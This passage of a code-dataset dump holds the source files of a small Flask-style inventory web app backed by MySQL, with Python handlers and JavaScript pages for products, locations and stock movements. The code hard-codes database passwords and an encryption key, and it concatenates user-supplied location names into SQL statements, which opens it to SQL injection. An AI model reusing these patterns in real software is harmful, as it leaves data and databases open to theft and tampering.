something to response\r\n r = this.responseText\r\n if (r == 'success') {\r\n auth.innerHTML = r\r\n auth.style['color'] = 'green'\r\n }\r\n\r\n }\r\n xhr.send(JSON.stringify(data))\r\n\r\n\r\n }\r\n }\r\n})"
},
{
"alpha_fraction": 0.6409691572189331,
"alphanum_fraction": 0.6453744769096375,
"avg_line_length": 23.22222137451172,
"blob_id": "2e80c00315c4ab9e309a0d64092658ffc393090b",
"content_id": "247c4b8c137f766315aa92676435e002cfd596de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 454,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 18,
"path": "/api/list_user.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom crypto import cryptography as e\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\ncursor = mydb.cursor()\r\ncursor.execute('SELECT * FROM users;')\r\nd=cursor.fetchone()\r\nprint(e.decrypt(d[0]))\r\nprint(e.check('administrator',d[1]))\r\nprint(cursor.rowcount, \"record inserted.\")\r\n\r\ncursor.close() \r\nmydb.close()\r\n"
},
{
"alpha_fraction": 0.5231316685676575,
"alphanum_fraction": 0.8167259693145752,
"avg_line_length": 40.62963104248047,
"blob_id": "4a059fc12eb21f6d2bf7ec0ad51df6a66cba8e1d",
"content_id": "b3ad31a7ecc4c66e15f07f0f841570263b7cd686",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 27,
"path": "/README.md",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "# hybrowlabs\nSample Project\n\nvideo-demo:\nhttps://user-images.githubusercontent.com/48561545/120913839-c9aff980-c6b7-11eb-98bc-d89e528a45f6.mp4\n\nlogin:page:\n\n\nchange-password-page:\n\n\ndashboard-page:\n\n\nproducts-page:\n\n\nproduct-edit-page:\n\n\n\nmovements-page:\n\n\nadd-movement-page:\n\n"
},
{
"alpha_fraction": 0.559116780757904,
"alphanum_fraction": 0.5683760643005371,
"avg_line_length": 22.13793182373047,
"blob_id": "733971b30a98448c472bea023ae6beef43c80299",
"content_id": "033b61298c70740a765e629e08af3aaabd7712a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1404,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 58,
"path": "/static/products.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "function edit(){\r\n id=this.getAttribute('name')\r\n var xhr1 = new XMLHttpRequest();\r\n xhr1.open('POST','/product_edit_id',true);\r\n xhr1.setRequestHeader('Content-type', 'application/json');\r\n xhr1.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/product_edit_page'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr1.send(JSON.stringify(data)) \r\n\r\n}\r\n\r\nfunction del(){\r\n id=this.getAttribute('name')\r\n console.log('delete-clicked')\r\n var xhr2 = new XMLHttpRequest();\r\n xhr2.open('POST','/product_delete',true);\r\n xhr2.setRequestHeader('Content-type', 'application/json');\r\n xhr2.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/products'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr2.send(JSON.stringify(data))\r\n\r\n}\r\n\r\n\r\n\r\n\r\nfunction init(){\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open('POST','/product_id_list',true);\r\nxhr.setRequestHeader('Content-type', 'application/json');\r\nxhr.onload = function () {\r\n r=this.responseText\r\n r = parseInt(r) \r\n var i \r\n for(i=1;i<=r;i++){\r\n t='edit-'+i.toString()\r\n document.getElementById(t).onclick = edit;\r\n t1='delete-'+i.toString() \r\n document.getElementById(t1).onclick = del;\r\n }\r\n\r\n }\r\n\r\ndata = {'data':'data'}\r\nxhr.send(JSON.stringify(data))\r\n}\r\n\r\ninit()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6840490698814392,
"alphanum_fraction": 0.6840490698814392,
"avg_line_length": 27.636363983154297,
"blob_id": "62fd094b6d3a8161dd345d9dc204b3050cec683b",
"content_id": "28ce072bd224af6120a923fe5b215345314c6ecb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 11,
"path": "/static/dashboard.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.getElementById('products').addEventListener('click', ()=>{\r\n window.location='/products'\r\n})\r\n\r\ndocument.getElementById('locations').addEventListener('click', ()=>{\r\n window.location='/locations'\r\n})\r\n\r\ndocument.getElementById('movements').addEventListener('click', ()=>{\r\n window.location='/movements'\r\n})\r\n"
},
{
"alpha_fraction": 0.48685404658317566,
"alphanum_fraction": 0.4895738959312439,
"avg_line_length": 28.47222137451172,
"blob_id": "b1b04f2153db6f103293c19377ac8ea5227632bb",
"content_id": "392d021b61af599b40e7f5359b2d4c64519ecf69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 36,
"path": "/api/change_password.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom .crypto import cryptography as e\r\n\r\nclass change_pass:\r\n def change(username,new,old):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n mydb.autocommit = True\r\n\r\n cursor = mydb.cursor() \r\n\r\n cursor.execute('SELECT * FROM users;')\r\n user = cursor.fetchone()\r\n cursor.close()\r\n cursor = mydb.cursor()\r\n res='' \r\n if e.decrypt(user[0]) == username:\r\n if( e.check(old,user[1])):\r\n username = user[0]\r\n new = e.hash(new)\r\n sql=\"\"\"UPDATE users SET password = %s WHERE username = %s\"\"\";\r\n val=(new,username)\r\n cursor.execute(sql,val)\r\n res= 'Password change successful'\r\n else:\r\n res= 'Current password incorrect!'\r\n else:\r\n res='User not found!'\r\n mydb.commit()\r\n cursor.close()\r\n mydb.close()\r\n return res\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5409924387931824,
"alphanum_fraction": 0.5420712232589722,
"avg_line_length": 27.935483932495117,
"blob_id": "6869aab6572e78ab2924096fafddbca85df61d32",
"content_id": "289597c73ea3cff3e63c30d274902d8fae7bd30c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1854,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 62,
"path": "/static/add_location.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.getElementById('add-button').addEventListener('click',()=>{\r\n lname = document.getElementById('name').value \r\n auth = document.getElementById('auth')\r\n if(lname==''){\r\n auth.innerHTML = 'Location Name Cannot be empty!'\r\n }\r\n else{\r\n const locationname = {'name': lname}\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/location_add',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if(r=='Location Exists!'){\r\n auth.innerHTML=r \r\n auth.style['color'] = \"red\";\r\n }\r\n else{\r\n auth.innerHTML=r;\r\n auth.style['color'] = \"green\";\r\n\r\n }\r\n };\r\n xhr.send(JSON.stringify(locationname))\r\n }\r\n});\r\n\r\ndocument.getElementById('back-button').addEventListener('click', ()=>{\r\n document.location ='/locations'\r\n});\r\n\r\n\r\ndocument.addEventListener('keypress',function(event){\r\n if(event.keyCode==13){\r\n lname = document.getElementById('name').value \r\n auth = document.getElementById('auth')\r\n if(lname==''){\r\n auth.innerHTML = 'Location Name Cannot be empty!'\r\n }\r\n else{\r\n const locationname = {'name': lname}\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/location_add',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if(r=='Location Exists!'){\r\n auth.innerHTML=r \r\n auth.style['color'] = \"red\";\r\n }\r\n else{\r\n auth.innerHTML=r;\r\n auth.style['color'] = \"green\";\r\n \r\n }\r\n };\r\n xhr.send(JSON.stringify(locationname))\r\n }\r\n\r\n }});"
},
{
"alpha_fraction": 0.56695157289505,
"alphanum_fraction": 0.5754985809326172,
"avg_line_length": 21.426666259765625,
"blob_id": "050b5086d8fa2aa011ee2c7cbee74549498df94f",
"content_id": "34609b288e703a2a1f11e689fafdaac2fd90a2e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1755,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 75,
"path": "/static/movements.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "function edit(){\r\n id=this.getAttribute('name')\r\n var xhr1 = new XMLHttpRequest();\r\n xhr1.open('POST','/movement_edit_id',true);\r\n xhr1.setRequestHeader('Content-type', 'application/json');\r\n xhr1.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/movement_edit_page'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr1.send(JSON.stringify(data)) \r\n\r\n}\r\n\r\nfunction del(){\r\n id=this.getAttribute('name')\r\n console.log('delete-clicked')\r\n var xhr2 = new XMLHttpRequest();\r\n xhr2.open('POST','/movement_delete',true);\r\n xhr2.setRequestHeader('Content-type', 'application/json');\r\n xhr2.onload = function(){\r\n r=this.responseText\r\n if(r=='success'){\r\n window.location='/movements'\r\n }\r\n }\r\n data = {'id':id}\r\n xhr2.send(JSON.stringify(data))\r\n\r\n}\r\n\r\n\r\n\r\n\r\nfunction init(){\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open('POST','/movement_id_list',true);\r\nxhr.setRequestHeader('Content-type', 'application/json');\r\nxhr.onload = function () {\r\n r=this.responseText\r\n console.log(r)\r\n r = parseInt(r) \r\n var i \r\n for(i=1;i<=r;i++){\r\n t='edit-'+i.toString()\r\n document.getElementById(t).onclick = edit;\r\n t1='delete-'+i.toString() \r\n document.getElementById(t1).onclick = del;\r\n }\r\n\r\n }\r\n\r\ndata = {'data':'data'}\r\nxhr.send(JSON.stringify(data))\r\n}\r\n\r\ninit()\r\n\r\n\r\nfrom=document.getElementsByClassName('movement-from')\r\nfor(var i=0;i<from.length;i++){\r\n if(from[i].innerHTML==''){\r\n from[i].innerHTML='Nil'\r\n }\r\n}\r\n\r\n\r\nfrom=document.getElementsByClassName('movement-to')\r\nfor(var i=0;i<from.length;i++){\r\n if(from[i].innerHTML==''){\r\n from[i].innerHTML='Nil'\r\n }\r\n}"
},
{
"alpha_fraction": 0.4714285731315613,
"alphanum_fraction": 0.47380951046943665,
"avg_line_length": 26.758621215820312,
"blob_id": "13ed365be2aed47625310a00b89f3a86ce7ebb22",
"content_id": "68c6f7ec9640de3d46f18e40426ff237ccb87c1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 29,
"path": "/api/signin.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom .crypto import cryptography as e\r\n\r\nclass user_signin:\r\n def authenticate_user(username,password):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n\r\n cursor = mydb.cursor() \r\n cursor.execute(\"SELECT * FROM users\")\r\n users = cursor.fetchall()\r\n res=''\r\n for i in users:\r\n if username == e.decrypt(i[0]):\r\n r=e.check(password,i[1])\r\n if(r):\r\n res='success'\r\n break\r\n else:\r\n res='Password Incorrect!'\r\n else:\r\n res= 'username not found!'\r\n cursor.close()\r\n mydb.close()\r\n return res\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6991404294967651,
"alphanum_fraction": 0.6991404294967651,
"avg_line_length": 21,
"blob_id": "2b3ca27bd3a35b12d2adfb6137ddfd11b16fc7fa",
"content_id": "ec617d8e6e3b820dcb42c67c6348358ace9fd2c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 15,
"path": "/api/create_database.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\"\r\n)\r\n\r\ncursor = mydb.cursor()\r\ncursor.execute(\"SHOW DATABASES\")\r\nprint(cursor)\r\n#creating database\r\nif 'hybrowlabs' not in cursor:\r\n cursor.execute(\"CREATE DATABASE hybrowlabs\")\r\n print('created successfully')\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5653235912322998,
"alphanum_fraction": 0.5677655935287476,
"avg_line_length": 21.97058868408203,
"blob_id": "487cd5bede9862834c71b6c4b589ffcf5f365322",
"content_id": "60d5419d159f118dc16227ccc1b0394c721d8b0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 819,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 34,
"path": "/api/crypto.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import bcrypt \r\nfrom cryptography.fernet import Fernet\r\n\r\n\r\nclass cryptography:\r\n def hash(password):\r\n return bcrypt.hashpw(password.encode(),bcrypt.gensalt())\r\n \r\n\r\n def check(password,hash):\r\n return bcrypt.checkpw(password.encode(),hash) \r\n\r\n \r\n # def gen_key(self):\r\n # key = Fernet.generate_key()\r\n # print(key)\r\n\r\n def encrypt(item):\r\n key = b'kz6wJCv1egk9NgWTe8gQhptpQ-eSt6Jbf2JxtxquAW8='\r\n cipher_suite = Fernet(key)\r\n item = bytes(item,'utf-8')\r\n cipher_text = cipher_suite.encrypt(item)\r\n return cipher_text\r\n\r\n def decrypt(item):\r\n key = b'kz6wJCv1egk9NgWTe8gQhptpQ-eSt6Jbf2JxtxquAW8='\r\n cipher_suite = Fernet(key)\r\n plain_text = cipher_suite.decrypt(item) \r\n return plain_text.decode('utf-8')\r\n\r\n\r\n \r\n# c = cryptography()\r\n# print(c.check('password',b'$2b$12$fZEdY/7YbMKxxJqga9EUC.MjFizYM16jxh7U0V331UY6Qi7qfWiFe'))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5063660740852356,
"alphanum_fraction": 0.5141909718513489,
"avg_line_length": 41.6860466003418,
"blob_id": "a414be0ba1fc2f6921ed5a632d7bb4a1c00b0abf",
"content_id": "93f188755f969c90f5de5220b7e0ec02d37668cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7540,
"license_type": "no_license",
"max_line_length": 212,
"num_lines": 172,
"path": "/api/movements.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector \r\nimport datetime\r\nclass movement:\r\n def movement_edit(id,fr,to,pid,qty):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n\r\n cursor.execute('SELECT * FROM movements WHERE id=%s OR id=%s',(id,id))\r\n current = cursor.fetchone() \r\n if fr!='':\r\n cursor.execute('SELECT quantity from '+fr +' WHERE product=%s OR product=%s',(pid,pid))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)+int(current[5])-int(qty)\r\n cursor.execute('UPDATE '+fr+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,pid))\r\n mydb.commit()\r\n if to!='':\r\n cursor.execute('SELECT quantity from '+to +' WHERE product=%s OR product=%s',(pid,pid))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)-int(current[5])+int(qty)\r\n cursor.execute('UPDATE '+to+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,pid))\r\n mydb.commit()\r\n\r\n sql = \"UPDATE movements SET from_loc=%s, to_loc=%s, product_id=%s, quantity=%s WHERE ID=%s\"\r\n val = (fr,to,pid,qty,id)\r\n cursor.execute(sql,val) \r\n mydb.commit()\r\n def movement_add(fr,to,product_id,quantity):\r\n timestamp=datetime.datetime.now()\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS movements(id INT PRIMARY KEY, timestamp VARCHAR(40) NOT NULL, from_loc VARCHAR(40) NOT NULL, to_loc VARCHAR(40) NOT NULL,product_id VARCHAR(40), quantity INT);\")\r\n cursor.execute('SELECT * FROM movements;')\r\n r = cursor.fetchall()\r\n l = len(r)+1\r\n sql = \"INSERT INTO movements(id,timestamp,from_loc,to_loc,product_id,quantity) VALUES (%s,%s,%s,%s,%s,%s)\"\r\n val = (l,timestamp,fr,to,product_id,quantity)\r\n cursor.execute(sql,val)\r\n if(fr!=''):\r\n sql = \"CREATE TABLE IF NOT EXISTS \" + fr +\"(id INT PRIMARY KEY, product VARCHAR(40) NOT NULL, quantity INT);\"\r\n cursor.execute(sql)\r\n cursor.execute(\"SELECT * FROM \"+fr)\r\n r = cursor.fetchall() \r\n f=0\r\n for i in r:\r\n if i[1]==product_id:\r\n if int(i[2])<int(quantity):\r\n return 'Insufficient stock in From Location!'\r\n f=1\r\n\r\n if(f==0):\r\n return 'Product Not found in From Location!'\r\n else:\r\n cursor.execute('SELECT quantity from '+fr +' WHERE product=%s OR product=%s',(product_id,product_id))\r\n r=cursor.fetchone() \r\n if not r:\r\n cursor.execute('SELECT * FROM '+to)\r\n cursor.fetchall()\r\n id = cursor.rowcount +1\r\n cursor.execute('INSERT INTO '+fr+'(id,product,quantity) VALUES(%s,%s,%s)',(id,product_id,quantity))\r\n mydb.commit()\r\n else:\r\n pq = r[0]\r\n quantity1 = int(pq)-int(quantity)\r\n cursor.execute('UPDATE '+fr+ ' SET QUANTITY=%s WHERE product=%s;',(quantity1,product_id))\r\n mydb.commit()\r\n if(to!=''):\r\n sql = \"CREATE TABLE IF NOT EXISTS \" + to +\"(id INT PRIMARY KEY, product VARCHAR(40) NOT NULL, quantity INT);\"\r\n cursor.execute(sql) \r\n cursor.execute('SELECT quantity from '+ to +' WHERE product=%s OR product=%s;',(product_id,product_id))\r\n r=cursor.fetchone() \r\n if not r:\r\n cursor.execute('SELECT * FROM '+to)\r\n cursor.fetchall()\r\n id = cursor.rowcount +1\r\n cursor.execute('INSERT INTO '+ to +'(id,product,quantity) VALUES(%s,%s,%s)',(id,product_id,quantity))\r\n mydb.commit()\r\n else:\r\n pq = r[0]\r\n quantity = int(pq)+int(quantity)\r\n cursor.execute('UPDATE '+to+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,product_id))\r\n mydb.commit()\r\n return 'Movement Added Successfully'\r\n\r\n def get_movements():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS movements(id INT PRIMARY KEY, timestamp VARCHAR(40) NOT NULL, from_loc VARCHAR(40) NOT NULL, to_loc VARCHAR(40) NOT NULL,product_id VARCHAR(40), quantity INT);\")\r\n cursor.execute('SELECT * FROM movements;')\r\n r=cursor.fetchall()\r\n return r \r\n\r\n def get(id):\r\n id=int(id)\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n sql = \"\"\"SELECT * FROM movements WHERE id=%s or id=%s\"\"\"\r\n val = (id,id)\r\n cursor.execute(sql,val)\r\n return cursor.fetchone() \r\n def movement_id_list():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM movements;')\r\n cursor.fetchall()\r\n return str(cursor.rowcount)\r\n def movement_delete(id):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute(\"SELECT from_loc,to_loc,product_id,quantity FROM movements WHERE id=%s OR id=%s\",(id,id))\r\n res = cursor.fetchone() \r\n if res[0]!='':\r\n cursor.execute('SELECT quantity from '+res[0] +' WHERE product=%s OR product=%s',(res[2],res[2]))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)+int(res[3])\r\n cursor.execute('UPDATE '+res[0]+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,res[2]))\r\n mydb.commit()\r\n if res[1]!='':\r\n cursor.execute('SELECT quantity from '+res[1] +' WHERE product=%s OR product=%s',(res[2],res[2]))\r\n r=cursor.fetchone()\r\n pq = r[0]\r\n quantity = int(pq)-int(res[3])\r\n cursor.execute('UPDATE '+res[1]+ ' SET QUANTITY=%s WHERE product=%s;',(quantity,res[2]))\r\n mydb.commit()\r\n\r\n\r\n sql = \"DELETE FROM movements WHERE id=%s OR id=%s;\"\r\n val=(id,id)\r\n cursor.execute(sql,val)\r\n cursor.execute('SELECT * FROM movements;')\r\n data = cursor.fetchall() \r\n cursor.execute('TRUNCATE TABLE movements')\r\n d = 1 \r\n for i in data:\r\n sql = \"INSERT INTO movements(id,timestamp,from_loc,to_loc,product_id,quantity) VALUES (%s,%s,%s,%s,%s,%s);\"\r\n val = (d,i[1],i[2],i[3],i[4],i[5])\r\n cursor.execute(sql,val)\r\n d+=1\r\n mydb.commit()\r\n return 'success'\r\n \r\n\r\n\r\n "
},
{
"alpha_fraction": 0.70465487241745,
"alphanum_fraction": 0.70465487241745,
"avg_line_length": 22.038461685180664,
"blob_id": "6253a17bc63f1858fd1a12a7a4fb0eb965d02472",
"content_id": "a2663ec135550c28eaf74e4becde6253a919ce7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 623,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 26,
"path": "/api/insert_user.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\nfrom crypto import cryptography as e\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n)\r\n\r\ncursor = mydb.cursor() \r\ncursor.execute('CREATE TABLE IF NOT EXISTS users(username BLOB NOT NULL, password BLOB NOT NULL);')\r\n\r\n\r\nusername = 'administrator'\r\npassword = 'administrator'\r\n\r\nusername = e.encrypt(username)\r\npassword = e.hash(password)\r\n\r\nsql = \"INSERT INTO users(username, password) VALUES (%s,%s);\"\r\nval = (username, password)\r\ncursor.execute(sql,val)\r\n\r\nmydb.commit()\r\n\r\nprint(cursor.rowcount, \"record inserted.\")"
},
{
"alpha_fraction": 0.49673911929130554,
"alphanum_fraction": 0.5,
"avg_line_length": 32.149532318115234,
"blob_id": "8f61f83fccd1b83c933c83e41356a244ad8fffc2",
"content_id": "2d6b0f308b0ae3071c40d07f5ab16daa097fdff0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 107,
"path": "/api/products.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector \r\n\r\nclass product:\r\n def product_edit(id,name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n sql = \"UPDATE products SET name=%s WHERE ID=%s\"\r\n val = (name,id)\r\n cursor.execute(sql,val) \r\n mydb.commit()\r\n def product_add(name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS products(id INT PRIMARY KEY, name VARCHAR(40));\")\r\n cursor.execute('SELECT * FROM products;')\r\n r = cursor.fetchall()\r\n f=1\r\n for i in r:\r\n if i[1]==name:\r\n f=0\r\n break\r\n if(f):\r\n l = len(r)+1\r\n sql = \"INSERT INTO products(id,name) VALUES (%s,%s)\"\r\n val = (l,name)\r\n cursor.execute(sql,val)\r\n mydb.commit()\r\n return 'Product Added Successfully'\r\n else:\r\n return 'Product Exists!'\r\n\r\n def get_products():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute('CREATE TABLE IF NOT EXISTS products(id INT PRIMARY KEY, name VARCHAR(40) NOT NULL);')\r\n cursor.execute('SELECT * FROM products;')\r\n r=cursor.fetchall()\r\n return r \r\n\r\n def get(id):\r\n id=int(id)\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n sql = \"\"\"SELECT * FROM products WHERE id=%s or id=%s\"\"\"\r\n val = (id,id)\r\n cursor.execute(sql,val)\r\n return cursor.fetchone() \r\n def product_id_list():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM products;')\r\n cursor.fetchall()\r\n return str(cursor.rowcount)\r\n def product_delete(id):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT name FROM products WHERE id=%s OR id=%s;',(id,id))\r\n pname = cursor.fetchone() \r\n cursor.execute('SELECT name FROM locations;')\r\n locations = cursor.fetchall()\r\n for i in locations:\r\n cursor.execute('DELETE FROM '+ i[0]+' WHERE product=%s or product=%s',(pname,pname))\r\n mydb.commit()\r\n sql = \"DELETE FROM products WHERE id=%s OR id=%s;\"\r\n val=(id,id)\r\n cursor.execute(sql,val)\r\n cursor.execute('SELECT * FROM products;')\r\n data = cursor.fetchall() \r\n cursor.execute('TRUNCATE TABLE products')\r\n d = 1 \r\n for i in data:\r\n sql = \"INSERT INTO products(id,name) VALUES(%s,%s);\"\r\n val = (d,i[1])\r\n cursor.execute(sql,val)\r\n d+=1\r\n mydb.commit()\r\n return 'success'\r\n \r\n\r\n\r\n "
},
{
"alpha_fraction": 0.6099726557731628,
"alphanum_fraction": 0.6113387942314148,
"avg_line_length": 31.953489303588867,
"blob_id": "9282cc157356cee8c06aba45ee8575cc52c23cfe",
"content_id": "c099dc4b82f131defb84dc1f05b35c8719c76049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1464,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 43,
"path": "/static/login.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.addEventListener('keypress',function(event){\r\n if(event.keyCode==13){\r\n // console.log('clicked');\r\n username = document.getElementById('username').value \r\n password = document.getElementById('password').value \r\n const user = {username: username, password:password} \r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/auth',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n r = this.responseText\r\n if(r=='success'){\r\n console.log('redirect call')\r\n window.location = \"/loginredirect\"\r\n }\r\n else{\r\n document.getElementById('auth').innerHTML=r;\r\n }\r\n };\r\n xhr.send(JSON.stringify(user))\r\n}\r\n});\r\n\r\ndocument.getElementById('login-button').addEventListener('click', ()=>{\r\n username = document.getElementById('username').value \r\n password = document.getElementById('password').value \r\n const user = {username: username, password:password} \r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST','/auth',true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if(r=='success'){\r\n console.log('redirect call')\r\n window.location = \"/loginredirect\"\r\n }\r\n else{\r\n document.getElementById('auth').innerHTML=r;\r\n }\r\n };\r\n xhr.send(JSON.stringify(user))\r\n});\r\n\r\n\r\n"
}
] | 18 |
deshudiosh/pyBOY | https://github.com/deshudiosh/pyBOY | d44d031dd862701617371731b76d3ce03aec9b0c | 5da7269840a42c1bf86a0be2478eac4c6a94da2f | 7b599fb2349dff97098d3cb2a34f67c523ac318e | refs/heads/master | 2021-07-11T16:50:23.219686 | 2017-10-17T09:11:30 | 2017-10-17T09:11:30 | 106,881,031 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.521789014339447,
